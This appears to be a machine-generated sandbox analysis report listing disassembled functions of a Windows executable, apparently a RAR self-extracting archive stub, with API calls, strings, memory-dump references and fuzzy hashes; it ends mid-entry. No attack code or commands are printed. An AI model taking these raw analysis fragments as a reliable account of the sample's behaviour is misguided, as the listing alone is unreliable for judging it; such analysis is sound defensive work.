Function 00007FF70E79B9B4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF70E79BA12
GetProcAddress.KERNEL32 ref: 00007FF70E79BA2D
GetCurrentProcessId.KERNEL32 ref: 00007FF70E79BACA

Part of subcall function 00007FF70E79DFD0: GetSystemDirectoryW.KERNEL32 ref: 00007FF70E79DDDF

Strings

CryptUnprotectMemory failed, xrefs: 00007FF70E79BAC1
CryptProtectMemory failed, xrefs: 00007FF70E79BA80
CryptProtectMemory, xrefs: 00007FF70E79BA08
CryptUnprotectMemory, xrefs: 00007FF70E79BA1F
Crypt32.dll, xrefs: 00007FF70E79B9F0

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: AddressProc$CurrentDirectoryProcessSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
API String ID: 2915667086-2207617598
Opcode ID: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
Instruction ID: b4f5fdea09811fe82bec1243e7e497089be22d0f762b58fb4d7581fc4e06f388
Opcode Fuzzy Hash: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
Instruction Fuzzy Hash: 8B315C24A09B4681FA18EB25FD58179B3A4EF8CBA4FC43136C90E077A4DF7CE5818324

Function 00007FF70E7A87D8 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 415COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A8DB6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A8DC2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A8DCE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A8DDA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A8DE0

Strings

, xrefs: 00007FF70E7A88BE
, xrefs: 00007FF70E7A8A55

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: $
API String ID: 3668304517-227171996
Opcode ID: f030c4eb17d52201791ace9f286aabb5ba9f942de39f9151f6af03753080fb30
Instruction ID: 005a57b642562832b2e80fd6f34d0ff68b912d34d9087e6849c4cbc4274d8f9e
Opcode Fuzzy Hash: f030c4eb17d52201791ace9f286aabb5ba9f942de39f9151f6af03753080fb30
Instruction Fuzzy Hash: 42F1D262F1574680FF18AB65D8481BCA361AF9CB98F986231CA6D17BD5DF7CE080C361

Function 00007FF70E7B57EC Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF70E7B598A
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF70E7B5CAD
abort.LIBCMT ref: 00007FF70E7B5CE1

Strings

csm, xrefs: 00007FF70E7B59B1
csm, xrefs: 00007FF70E7B58D1
csm, xrefs: 00007FF70E7B5933

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 2940173790-393685449
Opcode ID: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
Instruction ID: 30050c1ca2633284f13746f6220aaad27104636f855623a6e70ec99de22821b1
Opcode Fuzzy Hash: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
Instruction Fuzzy Hash: 5FE1C172A087828AE710AF64D8803ADB7A2FF69758F942135DECD47796DF38E485C710

Function 00007FF70E794F38 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 158COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70E794E24: SysAllocString.OLEAUT32 ref: 00007FF70E794E5F

VariantClear.OLEAUT32 ref: 00007FF70E795125

Strings

ROOT\CIMV2, xrefs: 00007FF70E794F7B
SELECT * FROM Win32_OperatingSystem, xrefs: 00007FF70E795017
WQL, xrefs: 00007FF70E79502A
Name, xrefs: 00007FF70E7950F9
Windows 10, xrefs: 00007FF70E79510A

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: AllocClearStringVariant
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 1959693985-3505469590
Opcode ID: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
Instruction ID: 6c2d8d67491e6d91ca77f3489b5bb9b36fb34ebd19343f9bb5c2adeee1d523f8
Opcode Fuzzy Hash: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
Instruction Fuzzy Hash: 3A712D76A14A1585EB20DF25EC905ADB7B4FF8CB98B846136EA4D43B64DF3CD584C320

Function 00007FF70E7B72EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,00000000,00007FF70E7B74F3,?,?,?,00007FF70E7B525E,?,?,?,00007FF70E7B5219), ref: 00007FF70E7B7371
GetLastError.KERNEL32(?,?,00000000,00007FF70E7B74F3,?,?,?,00007FF70E7B525E,?,?,?,00007FF70E7B5219), ref: 00007FF70E7B737F
LoadLibraryExW.KERNEL32(?,?,00000000,00007FF70E7B74F3,?,?,?,00007FF70E7B525E,?,?,?,00007FF70E7B5219), ref: 00007FF70E7B73A9
FreeLibrary.KERNEL32(?,?,00000000,00007FF70E7B74F3,?,?,?,00007FF70E7B525E,?,?,?,00007FF70E7B5219), ref: 00007FF70E7B73EF
GetProcAddress.KERNEL32(?,?,00000000,00007FF70E7B74F3,?,?,?,00007FF70E7B525E,?,?,?,00007FF70E7B5219), ref: 00007FF70E7B73FB

Strings

api-ms-, xrefs: 00007FF70E7B7391

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
Instruction ID: d4c9cdced284066bcc02563383dbf4b01b1e7f000c98eb12ff3ac3c66ce5a6d5
Opcode Fuzzy Hash: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
Instruction Fuzzy Hash: 1131E521A1A68281FE19BB06EC00675A794FF9CBB0F996636DD5D0B780DF3CE0458330

Function 00007FF70E7B1604 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,00007FF70E7B1573,?,?,?,00007FF70E7B192A), ref: 00007FF70E7B162B
GetProcAddress.KERNEL32(?,?,?,00007FF70E7B1573,?,?,?,00007FF70E7B192A), ref: 00007FF70E7B1648
GetProcAddress.KERNEL32(?,?,?,00007FF70E7B1573,?,?,?,00007FF70E7B192A), ref: 00007FF70E7B1664

Strings

AcquireSRWLockExclusive, xrefs: 00007FF70E7B163E
ReleaseSRWLockExclusive, xrefs: 00007FF70E7B1653
KERNEL32.DLL, xrefs: 00007FF70E7B1624

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
Instruction ID: e6f065f549cac53f3fd692486176885e5417bc8115b059c2496f68d0620413f0
Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
Instruction Fuzzy Hash: 77111E20A1AB4282FE69AB04FD50374E2AD6F1C798FDC7439C85D06759EF3CB4849631

Function 00007FF70E79ED24 Relevance: 9.1, APIs: 6, Instructions: 120timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70E7951A4: GetVersionExW.KERNEL32 ref: 00007FF70E7951D5

FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF70E785AB4), ref: 00007FF70E79ED8C
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF70E785AB4), ref: 00007FF70E79ED98
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF70E785AB4), ref: 00007FF70E79EDA8
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF70E785AB4), ref: 00007FF70E79EDB6
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF70E785AB4), ref: 00007FF70E79EDC4
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF70E785AB4), ref: 00007FF70E79EE05

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
Instruction ID: 6304df710bfef05c10e2afe1a263addbad4bfbcd22e4c3492404fd4566a43514
Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
Instruction Fuzzy Hash: FB518BB2B106528AEB04DFB8D8441ACB7B1FB4CB98BA0503ADE0D57B58DF38E546C710

Function 00007FF70E79F010 Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32 ref: 00007FF70E79F074

Part of subcall function 00007FF70E7951A4: GetVersionExW.KERNEL32 ref: 00007FF70E7951D5

LocalFileTimeToFileTime.KERNEL32 ref: 00007FF70E79F096
FileTimeToSystemTime.KERNEL32 ref: 00007FF70E79F0A2
TzSpecificLocalTimeToSystemTime.KERNEL32 ref: 00007FF70E79F0B2
SystemTimeToFileTime.KERNEL32 ref: 00007FF70E79F0C0
SystemTimeToFileTime.KERNEL32 ref: 00007FF70E79F0CE

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
Instruction ID: d663da2b01f8f1307665cca65516fbde749f46467e0e7f552b9a07c281d80b8c
Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
Instruction Fuzzy Hash: 1D313962B10A518EFB04DFB5E8801BC7770FF08758B94602AEE0E97A58EF38D895C711

Function 00007FF70E797918 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E797C8C

Strings

sfx, xrefs: 00007FF70E7979F3, 00007FF70E797A02
rar, xrefs: 00007FF70E797A9B, 00007FF70E797AAA, 00007FF70E797B67, 00007FF70E797B7C
exe, xrefs: 00007FF70E7979AF, 00007FF70E7979BE
.rar, xrefs: 00007FF70E797969, 00007FF70E797978

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: .rar$exe$rar$sfx
API String ID: 3668304517-630704357
Opcode ID: ded382a5f33e5d00d019a19aa0952dad5d31072c5da8fffb523e0446b7f74fbf
Instruction ID: 51394f34f2c9b0299771ae8e50ca4d2fa3d1d3a5e397ed720e3d1ae9ad6a72f8
Opcode Fuzzy Hash: ded382a5f33e5d00d019a19aa0952dad5d31072c5da8fffb523e0446b7f74fbf
Instruction Fuzzy Hash: C1A1A222A1860640EA08EB35DC553BCA361FF59BA8F942236DE5D076E5DF3CE581C360

Function 00007FF70E7B5CE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF70E7B5D58

Part of subcall function 00007FF70E7B5210: abort.LIBCMT ref: 00007FF70E7B5223

_CallSETranslator.LIBVCRUNTIME ref: 00007FF70E7B5DA3
abort.LIBCMT ref: 00007FF70E7B5FD1

Strings

RCC, xrefs: 00007FF70E7B5D74
MOC, xrefs: 00007FF70E7B5D6C

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
Instruction ID: 10b782ab7ef79be1ed62de598b9754cbafe993c0323909639fb6c3ddf6911b5b
Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
Instruction Fuzzy Hash: CC91B073A08B818AE711EB64E8803ADBBA1FB18788F545139EF8C57B55DF38D195CB10

Function 00007FF70E7B4F80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF70E7B4FAB
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF70E7B5040
RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FF70E7B2F5E), ref: 00007FF70E7B508F

Strings

csm, xrefs: 00007FF70E7B5026
f, xrefs: 00007FF70E7B4FBE

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
Instruction ID: a41b8822e08f507a4669938ddfd59bb53c0e7b7429757a561cf6946e9f109d95
Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
Instruction Fuzzy Hash: 4551F632E1960686EB54EF25EC44B29B397FF68B88F909134DA9E07748DF78E841C750

Function 00007FF70E78CEE0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 139COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF70E78D03D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78D0D1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78D0D7

Part of subcall function 00007FF70E78DE04: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF70E78CF4B), ref: 00007FF70E78DE27
Part of subcall function 00007FF70E78DE04: GetLastError.KERNEL32 ref: 00007FF70E78DE88
Part of subcall function 00007FF70E78DE04: CloseHandle.KERNEL32 ref: 00007FF70E78DE9B

Strings

SeRestorePrivilege, xrefs: 00007FF70E78CF5E
SeSecurityPrivilege, xrefs: 00007FF70E78CF3F

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 2102711378-639343689
Opcode ID: cc2cdb65981a4fcc868e5d913d4f06653a23f25da57a99a038b17aaaeb8469e6
Instruction ID: 3d2a1c57b2d4328ca3d8bcf80c292fca62b6c0aa6162ff9cf6f785189ad1da03
Opcode Fuzzy Hash: cc2cdb65981a4fcc868e5d913d4f06653a23f25da57a99a038b17aaaeb8469e6
Instruction Fuzzy Hash: 2251E262F0874285FB10FB60ED402BDA360AFAC7A4F802535DE5D136D6DF3CA485C220

Function 00007FF70E7A7B28 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

ShowWindow.USER32 ref: 00007FF70E7A7B6F
GetWindowRect.USER32 ref: 00007FF70E7A7BC0
ShowWindow.USER32 ref: 00007FF70E7A7C96
ShowWindow.USER32 ref: 00007FF70E7A7CC3

Strings

RarHtmlClassName, xrefs: 00007FF70E7A7C4B

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Window$Show$Rect
String ID: RarHtmlClassName
API String ID: 2396740005-1658105358
Opcode ID: 7f8a0b662af83a4f47b362c37f36e9414f73daccdb18f375bc1ce0a7ee57f15d
Instruction ID: 4b89dce41f7b502db62a4a7f70d7414a9ac89bf04b453f2bad76990b79c75287
Opcode Fuzzy Hash: 7f8a0b662af83a4f47b362c37f36e9414f73daccdb18f375bc1ce0a7ee57f15d
Instruction Fuzzy Hash: 31518422609B4286EA24AF25E85437AF3A4FFCD784F846435DE8E47B55DF3CE4458710

Function 00007FF70E7AFD0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32 ref: 00007FF70E7AFD43
SetEnvironmentVariableW.KERNEL32 ref: 00007FF70E7AFDBC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AFE1B

Strings

sfxcmd, xrefs: 00007FF70E7AFD3C
sfxpar, xrefs: 00007FF70E7AFDB5

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
String ID: sfxcmd$sfxpar
API String ID: 3540648995-3493335439
Opcode ID: 42a5c16ff962b42e9c466757ddc2add4312beed441a9accfeec164922430c806
Instruction ID: d25acc08f2c42f3cbc0f0c48c872ece829d4bc8a84306da669fe6ba5c08b2f1f
Opcode Fuzzy Hash: 42a5c16ff962b42e9c466757ddc2add4312beed441a9accfeec164922430c806
Instruction Fuzzy Hash: ED316F32B14A0684FB08AB65EC941ACA371FF9CB98F942135DE5D177A9DF38E081C364

Function 00007FF70E7AFED4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON

Download Yara Rule

Strings

